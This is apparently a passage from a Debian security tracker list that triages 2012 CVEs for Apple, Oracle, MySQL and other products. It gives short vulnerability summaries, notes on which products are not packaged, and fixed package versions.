NOT-FOR-US: Google Chrome books CVE-2012-0694 [SugarCRM CE unserialize PHP code execution in multiple files] RESERVED - sugarcrm-ce-5.0 (bug #457876) NOTE: http://seclists.org/bugtraq/2012/Jun/165 CVE-2012-0693 (** DISPUTED ** submitticket.php in WHMCompleteSolution (WHMCS) 5.03 ...) NOT-FOR-US: WHMCompleteSolution CVE-2012-0692 (CA License (aka CA Licensing) before 1.90.03 allows local users to ...) NOT-FOR-US: CA License CVE-2012-0691 (CA License (aka CA Licensing) before 1.90.03 does not properly ...) NOT-FOR-US: CA License CVE-2012-0690 (TIBCO Spotfire Web Application, Web Player Application, Automation ...) NOT-FOR-US: TIBCO Spotfire CVE-2012-0689 (The server in TIBCO ActiveMatrix Platform in TIBCO Silver Fabric ...) NOT-FOR-US: TIBCO ActiveMatrix CVE-2012-0688 (Cross-site scripting (XSS) vulnerability in TIBCO ActiveMatrix ...) NOT-FOR-US: TIBCO ActiveMatrix CVE-2012-0687 (TIBCO ActiveMatrix Runtime Platform in Service Grid and Service Bus ...) NOT-FOR-US: TIBCO ActiveMatrix CVE-2012-0686 RESERVED CVE-2012-0685 (Integer overflow in XnViewer (aka XnView) before 1.98.5 allows remote ...) NOT-FOR-US: XnView CVE-2012-0684 (Integer overflow in XnViewer (aka XnView) before 1.98.5 allows remote ...) NOT-FOR-US: XnView CVE-2012-0683 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...) NOT-FOR-US: Apple Safari/ if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-0682 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...) NOT-FOR-US: Apple Safari/ if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-0681 (Apple Remote Desktop before 3.6.1 does not recognize the "Encrypt all ...) NOT-FOR-US: Apple Remote Desktop CVE-2012-0680 (Apple Safari before 6.0 does not properly handle the autocomplete ...) NOT-FOR-US: Apple Safari CVE-2012-0679 (Apple Safari before 6.0 allows remote attackers to read arbitrary ...) NOT-FOR-US: Apple Safari CVE-2012-0678 (Cross-site scripting (XSS) vulnerability in Apple Safari before 6.0 ...) NOT-FOR-US: Apple Safari CVE-2012-0677 (Heap-based buffer overflow in Apple iTunes before 10.6.3 allows remote ...) NOT-FOR-US: Apple iTunes CVE-2012-0676 (WebKit in Apple Safari before 5.1.7 does not properly track state ...) NOT-FOR-US: Apple Safari CVE-2012-0675 (Time Machine in Apple Mac OS X before 10.7.4 does not require ...) NOT-FOR-US: Time Machine CVE-2012-0674 (Safari in Apple iOS before 5.1.1 allows remote attackers to spoof the ...) NOT-FOR-US: Apple Safari CVE-2012-0673 RESERVED CVE-2012-0672 (WebKit in Apple iOS before 5.1.1 allows remote attackers to execute ...) NOTE: http://dl.packetstormsecurity.net/1205-advisories/APPLE-SA-2012-05-09-2.txt CVE-2012-0671 (Apple QuickTime before 7.7.2 allows remote attackers to execute ...) NOT-FOR-US: Apple QuickTime CVE-2012-0670 (Integer overflow in Apple QuickTime before 7.7.2 allows remote ...) NOT-FOR-US: Apple QuickTime CVE-2012-0669 (Buffer overflow in Apple QuickTime before 7.7.2 on Windows allows ...) NOT-FOR-US: Apple QuickTime CVE-2012-0668 (Buffer overflow in Apple QuickTime before 7.7.2 allows remote ...) NOT-FOR-US: Apple QuickTime CVE-2012-0667 (Integer signedness error in Apple QuickTime before 7.7.2 on Windows ...) NOT-FOR-US: Apple QuickTime CVE-2012-0666 (Stack-based buffer overflow in the plugin in Apple QuickTime before ...) NOT-FOR-US: Apple QuickTime CVE-2012-0665 (Heap-based buffer overflow in Apple QuickTime before 7.7.2 allows ...) NOT-FOR-US: Apple QuickTime CVE-2012-0664 (Heap-based buffer overflow in Apple QuickTime before 7.7.2 on Windows ...) NOT-FOR-US: Apple QuickTime CVE-2012-0663 (Multiple stack-based buffer overflows in Apple QuickTime before 7.7.2 ...) NOT-FOR-US: Apple QuickTime CVE-2012-0662 (Integer overflow in the Security Framework in Apple Mac OS X before ...) NOT-FOR-US: Apple Mac OS X CVE-2012-0661 (Use-after-free vulnerability in QuickTime in Apple Mac OS X 10.7.x ...) NOT-FOR-US: Apple Mac OS X CVE-2012-0660 (Buffer underflow in QuickTime in Apple Mac OS X before 10.7.4 allows ...) NOT-FOR-US: Apple Mac OS X CVE-2012-0659 (Integer overflow in QuickTime in Apple Mac OS X before 10.7.4 allows ...) NOT-FOR-US: Apple Mac OS X CVE-2012-0658 (Buffer overflow in QuickTime in Apple Mac OS X before 10.7.4 allows ...) NOT-FOR-US: Apple Mac OS X CVE-2012-0657 (Quartz Composer in Apple Mac OS X before 10.7.4, when the RSS ...) NOT-FOR-US: Apple Mac OS X CVE-2012-0656 (Race condition in LoginUIFramework in Apple Mac OS X 10.7.x before ...) NOT-FOR-US: Apple Mac OS X CVE-2012-0655 (libsecurity in Apple Mac OS X before 10.7.4 does not properly restrict ...) NOT-FOR-US: Apple Mac OS X CVE-2012-0654 (libsecurity in Apple Mac OS X before 10.7.4 accesses uninitialized ...) NOT-FOR-US: Apple Mac OS X CVE-2012-0653 RESERVED CVE-2012-0652 (Login Window in Apple Mac OS X 10.7.3, when Legacy File Vault or ...) NOT-FOR-US: Apple Mac OS X CVE-2012-0651 (The directory server in Directory Service in Apple Mac OS X 10.6.8 ...) NOT-FOR-US: Apple Mac OS X CVE-2012-0650 (Buffer overflow in the DirectoryService Proxy in DirectoryService in ...) NOT-FOR-US: Apple Mac OS X CVE-2012-0649 (Race condition in the initialization routine in blued in Bluetooth in ...) NOT-FOR-US: Apple Mac OS X CVE-2012-0648 (WebKit, as used in Apple iTunes before 10.6, allows man-in-the-middle ...) NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-0647 (WebKit in Apple Safari before 5.1.4 does not properly handle redirects ...) NOT-FOR-US: Apple Safari/ if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-0646 (Format string vulnerability in VPN in Apple iOS before 5.1 allows ...) NOT-FOR-US: VPN in Apple iOS CVE-2012-0645 (Siri in Apple iOS before 5.1 does not properly restrict the ability of ...) NOT-FOR-US: Siri CVE-2012-0644 (Race condition in the Passcode Lock feature in Apple iOS before 5.1 ...) NOT-FOR-US: Passcode Lock in Apple iOS CVE-2012-0643 (The kernel in Apple iOS before 5.1 does not properly handle debug ...) NOT-FOR-US: kernel in Apple iOS CVE-2012-0642 (Integer underflow in Apple iOS before 5.1 allows remote attackers to ...) NOT-FOR-US: Apple iOS CVE-2012-0641 (CFNetwork in Apple iOS before 5.1 does not properly construct request ...) NOT-FOR-US: Apple iOS CVE-2012-0640 (WebKit in Apple Safari before 5.1.4 does not properly implement "From ...) NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-0639 (WebKit, as used in Apple iTunes before 10.6, allows man-in-the-middle ...) NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-0638 (WebKit, as used in Apple iTunes before 10.6, allows man-in-the-middle ...) NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-0637 (WebKit, as used in Apple iTunes before 10.6, allows man-in-the-middle ...) NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-0636 (WebKit, as used in Apple iTunes before 10.6, allows man-in-the-middle ...) NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-0635 (WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows ...) NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-0634 (WebKit, as used in Apple iTunes before 10.6, allows man-in-the-middle ...) NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-0633 (WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows ...) NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-0632 (WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows ...) NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-0631 (WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows ...) NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-0630 (WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows ...) NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-0629 (WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows ...) NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-0628 (WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows ...) NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-0627 (WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows ...) NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-0626 (WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows ...) NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-0625 (WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows ...) NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-0624 (WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows ...) NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-0623 (WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows ...) NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-0622 (WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows ...) NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-0621 (WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows ...) NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-0620 (WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows ...) NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-0619 (WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows ...) NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-0618 (WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows ...) NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-0617 (WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows ...) NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-0616 (WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows ...) NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-0615 (WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows ...) NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-0614 (WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows ...) NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-0613 (WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows ...) NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-0612 (WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows ...) NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-0611 (WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows ...) NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-0610 (WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows ...) NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-0609 (WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows ...) NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-0608 (WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows ...) NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-0607 (WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows ...) NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-0606 (WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows ...) NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-0605 (WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows ...) NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-0604 (WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows ...) NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-0603 (WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows ...) NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-0602 (WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows ...) NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-0601 (WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows ...) NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-0600 (WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows ...) NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-0599 (WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows ...) NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-0598 (WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows ...) NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-0597 (WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows ...) NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-0596 (WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows ...) NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-0595 (WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows ...) NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-0594 (WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows ...) NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-0593 (WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows ...) NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-0592 (WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows ...) NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-0591 (WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows ...) NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-0590 (Cross-site scripting (XSS) vulnerability in WebKit, as used in Apple ...) NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-0589 (Cross-site scripting (XSS) vulnerability in WebKit, as used in Apple ...) NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-0588 (Cross-site scripting (XSS) vulnerability in WebKit, as used in Apple ...) NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-0587 (Cross-site scripting (XSS) vulnerability in WebKit, as used in Apple ...) NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-0586 (Cross-site scripting (XSS) vulnerability in WebKit, as used in Apple ...) NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-0585 (The Private Browsing feature in Safari in Apple iOS before 5.1 allows ...) NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-0584 (The Internationalized Domain Name (IDN) feature in Apple Safari before ...) NOT-FOR-US: Apple Safari CVE-2012-0583 (Unspecified vulnerability in the MySQL Server component in Oracle ...) {DSA-2496-1} - mysql-5.1 5.1.62-1 (bug #670636) - mysql-5.5 5.5.23-1 CVE-2012-0582 (Unspecified vulnerability in the Siebel Clinical component in Oracle ...) NOT-FOR-US: Oracle Industry Applications CVE-2012-0581 (Unspecified vulnerability in the Oracle Agile component in Oracle ...) NOT-FOR-US: Oracle Supply Chain Products Suite CVE-2012-0580 (Unspecified vulnerability in the Oracle Agile PLM for Process ...) NOT-FOR-US: Oracle Supply Chain Products Suite CVE-2012-0579 (Unspecified vulnerability in the Oracle FLEXCUBE Universal Banking ...) NOT-FOR-US: Oracle Financial Services Software CVE-2012-0578 (Unspecified vulnerability in the Server component in Oracle MySQL ...) - mysql-5.1 (Only affects 5.5) - mysql-5.5 5.5.29+dfsg-1 CVE-2012-0577 (Unspecified vulnerability in the Oracle FLEXCUBE Universal Banking ...) NOT-FOR-US: Oracle Financial Services Software CVE-2012-0576 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking ...) NOT-FOR-US: Oracle Financial Services Software CVE-2012-0575 (Unspecified vulnerability in the Oracle FLEXCUBE Universal Banking ...) NOT-FOR-US: Oracle Financial Services Software CVE-2012-0574 (Unspecified vulnerability in the Server component in Oracle MySQL ...) - mysql-5.1 - mysql-5.5 5.5.29+dfsg-1 CVE-2012-0573 (Unspecified vulnerability in the Oracle FLEXCUBE Universal Banking ...) NOT-FOR-US: Oracle Financial Services Software CVE-2012-0572 (Unspecified vulnerability in the Server component in Oracle MySQL ...) - mysql-5.1 - mysql-5.5 5.5.29+dfsg-1 CVE-2012-0571 (Unspecified vulnerability in the Oracle FLEXCUBE Universal Banking ...) NOT-FOR-US: Oracle Financial Services Software CVE-2012-0570 (Unspecified vulnerability in Oracle Sun Solaris 8, 9, 10, and 11 ...) NOT-FOR-US: Solaris CVE-2012-0569 (Unspecified vulnerability Oracle Sun Solaris 10 allows local users to ...) NOT-FOR-US: Oracle Sun Solaris CVE-2012-0568 (Unspecified vulnerability in Oracle Sun Solaris 8, 9, and 10 allows ...) NOT-FOR-US: Solaris CVE-2012-0567 (Unspecified vulnerability in the Oracle FLEXCUBE Universal Banking ...) NOT-FOR-US: Oracle Financial Services Software CVE-2012-0566 (Unspecified vulnerability in the Oracle Agile component in Oracle ...) NOT-FOR-US: Oracle Supply Chain Products Suite CVE-2012-0565 (Unspecified vulnerability in the Oracle Agile component in Oracle ...) NOT-FOR-US: Oracle Supply Chain Products Suite CVE-2012-0564 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools ...) NOT-FOR-US: Oracle PeopleSoft Products CVE-2012-0563 (Unspecified vulnerability in Oracle Solaris 9, 10, and 11 allows local ...) NOT-FOR-US: Oracle Solaris CVE-2012-0562 (Unspecified vulnerability in the PeopleSoft Enterprise HRMS component ...) NOT-FOR-US: Oracle PeopleSoft Products CVE-2012-0561 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools ...) NOT-FOR-US: Oracle PeopleSoft Products CVE-2012-0560 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools ...) NOT-FOR-US: Oracle PeopleSoft Products CVE-2012-0559 (Unspecified vulnerability in the PeopleSoft Enterprise SCM component ...) NOT-FOR-US: Oracle PeopleSoft Products CVE-2012-0558 (Unspecified vulnerability in the Primavera P6 Enterprise Project ...) NOT-FOR-US: Oracle Primavera Products Suite CVE-2012-0557 (Unspecified vulnerability in the Oracle Outside In Technology ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2012-0556 (Unspecified vulnerability in the Oracle Outside In Technology ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2012-0555 (Unspecified vulnerability in the Oracle Outside In Technology ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2012-0554 (Unspecified vulnerability in the Oracle Outside In Technology ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2012-0553 (Buffer overflow in yaSSL, as used in MySQL 5.1.x before 5.1.68 and ...) - mysql-5.1 - mysql-5.5 5.5.28+dfsg-1 - cyassl (bug #598391) - libyassl (bug #664533) NOTE: https://blogs.oracle.com/sunsecurity/entry/cve_2012_0553_buffer_overflow CVE-2012-0552 (Unspecified vulnerability in the Oracle Spatial component in Oracle ...) NOT-FOR-US: Oracle Database Server CVE-2012-0551 (Unspecified vulnerability in the Java Runtime Environment (JRE) in ...) - glassfish (Debian only builds some core libs, not the full application stack) - openjdk-6 (specific to Oracle Java) - openjdk-7 (specific to Oracle Java) CVE-2012-0550 (Unspecified vulnerability in the GlassFish Enterprise Server component ...) - glassfish (Debian only builds some core libs, not the full application stack) CVE-2012-0549 (Unspecified vulnerability in the Oracle AutoVue Office component in ...) NOT-FOR-US: Oracle Supply Chain Products Suite CVE-2012-0548 (Unspecified vulnerability in Oracle SPARC Enterprise M Series Servers ...) NOT-FOR-US: Oracle SPARC Enterprise M Series Servers XCP 1110 CVE-2012-0547 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-7 7u3-2.1.2-1 (low) - openjdk-6 6b24-1.11.4-1 (low) CVE-2012-0546 (Unspecified vulnerability in the Oracle FLEXCUBE Universal Banking ...) NOT-FOR-US: Oracle Financial Services Software CVE-2012-0545 (Unspecified vulnerability in the Oracle FLEXCUBE Universal Banking ...) NOT-FOR-US: Oracle Financial Services Software CVE-2012-0544 (Unspecified vulnerability in the Oracle FLEXCUBE Universal Banking ...) NOT-FOR-US: Oracle Financial Services Software CVE-2012-0543 (Unspecified vulnerability in the BI Publisher (formerly XML Publisher) ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2012-0542 (Unspecified vulnerability in the Oracle iStore component in Oracle ...) NOT-FOR-US: Oracle E-Business Suite CVE-2012-0541 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking ...) NOT-FOR-US: Oracle Financial Services Software CVE-2012-0540 (Unspecified vulnerability in Oracle MySQL Server 5.1.62 and earlier ...) {DSA-2496-1} - mysql-5.1 (bug #682212) - mysql-5.5 5.5.24+dfsg-1 (bug #682210) CVE-2012-0539 (Unspecified vulnerability in Oracle Sun Solaris 8, 9, and 10 allows ...) NOT-FOR-US: Oracle Sun Solaris CVE-2012-0538 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools ...) NOT-FOR-US: Oracle PeopleSoft Products CVE-2012-0537 (Unspecified vulnerability in the Oracle Application Object Library ...) NOT-FOR-US: Oracle E-Business Suite CVE-2012-0536 (Unspecified vulnerability in the PeopleSoft Enterprise HRMS component ...) NOT-FOR-US: Oracle PeopleSoft Products CVE-2012-0535 (Unspecified vulnerability in the Oracle Application Object Library ...) NOT-FOR-US: Oracle E-Business Suite CVE-2012-0534 (Unspecified vulnerability in the RDBMS Core component in Oracle ...) NOT-FOR-US: Oracle Database Server CVE-2012-0533 (Unspecified vulnerability in the PeopleSoft Enterprise FCSM component ...) NOT-FOR-US: Oracle PeopleSoft Products CVE-2012-0532 (Unspecified vulnerability in the Identity Manager component in Oracle ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2012-0531 (Unspecified vulnerability in the PeopleSoft Enterprise Portal ...) NOT-FOR-US: Oracle PeopleSoft Products CVE-2012-0530 (Unspecified vulnerability in the PeopleSoft Enterprise SCM component ...) NOT-FOR-US: Oracle PeopleSoft Products CVE-2012-0529 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools ...) NOT-FOR-US: Oracle PeopleSoft Products CVE-2012-0528 (Unspecified vulnerability in the Enterprise Manager Base Platform ...) NOT-FOR-US: Oracle Database Server CVE-2012-0527 (Unspecified vulnerability in the Enterprise Manager Base Platform ...) NOT-FOR-US: Oracle Database Server CVE-2012-0526 (Unspecified vulnerability in the Enterprise Manager Base Platform ...) NOT-FOR-US: Oracle Database Server CVE-2012-0525 (Unspecified vulnerability in the Enterprise Manager Base Platform ...) NOT-FOR-US: Oracle Database Server CVE-2012-0524 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools ...) NOT-FOR-US: Oracle PeopleSoft Products CVE-2012-0523 (Unspecified vulnerability in the Oracle Grid Engine component in ...) - gridengine 6.2u5-7.1 NOTE: http://www.securityfocus.com/bid/53132 NOTE: http://gridscheduler.sourceforge.net/security.html CVE-2012-0522 (Unspecified vulnerability in the Oracle JDeveloper component in Oracle ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2012-0521 (Unspecified vulnerability in the PeopleSoft Enterprise HCM component ...) NOT-FOR-US: Oracle PeopleSoft Products CVE-2012-0520 (Unspecified vulnerability in the Enterprise Manager Base Platform ...) NOT-FOR-US: Oracle Database Server CVE-2012-0519 (Unspecified vulnerability in the Core RDBMS component in Oracle ...) NOT-FOR-US: Oracle Database Server CVE-2012-0518 (Unspecified vulnerability in the Oracle Application Server Single ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2012-0517 (Unspecified vulnerability in the PeopleSoft Enterprise HRMS component ...) NOT-FOR-US: Oracle PeopleSoft Products CVE-2012-0516 (Unspecified vulnerability in the Oracle iPlanet Web Server component ...) NOT-FOR-US: Oracle Sun Products Suite CVE-2012-0515 (Unspecified vulnerability in the Identity Manager Connector component ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2012-0514 (Unspecified vulnerability in the PeopleSoft Enterprise CRM component ...) NOT-FOR-US: Oracle PeopleSoft Products CVE-2012-0513 (Unspecified vulnerability in the Oracle Application Object Library ...) NOT-FOR-US: Oracle E-Business Suite CVE-2012-0512 (Unspecified vulnerability in the Enterprise Manager Base Platform ...) NOT-FOR-US: Oracle Database Server CVE-2012-0511 (Unspecified vulnerability in the OCI component in Oracle Database ...) NOT-FOR-US: Oracle Database Server CVE-2012-0510 (Unspecified vulnerability in the Core RDBMS component in Oracle ...) NOT-FOR-US: Oracle Database Server CVE-2012-0509 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking ...) NOT-FOR-US: Oracle Financial Services Software CVE-2012-0508 (Unspecified vulnerability in the JavaFX component in Oracle Java SE ...) - openjdk-6 (JavaFX not part of OpenJDK) - openjdk-7 (JavaFX not part of OpenJDK) - sun-java6 [squeeze] - sun-java6 (Non-free not supported) CVE-2012-0507 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) {DSA-2420-1} - openjdk-6 6b24-1.11.1-1 - openjdk-7 7~u3-2.1-1 - sun-java6 [squeeze] - sun-java6 (Non-free not supported) NOTE: Replacement for misused CVE-2011-3571. CVE-2012-0506 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) {DSA-2420-1} - openjdk-6 6b24-1.11.1-1 - openjdk-7 7~u3-2.1-1 - sun-java6 [squeeze] - sun-java6 (Non-free not supported) CVE-2012-0505 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) {DSA-2420-1} - openjdk-6 6b24-1.11.1-1 - openjdk-7 7~u3-2.1-1 CVE-2012-0504 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-6 (Only applies to the Windows-specific update tool) - openjdk-7 (Only applies to the Windows-specific update tool) - sun-java6 (Only applies to the Windows-speci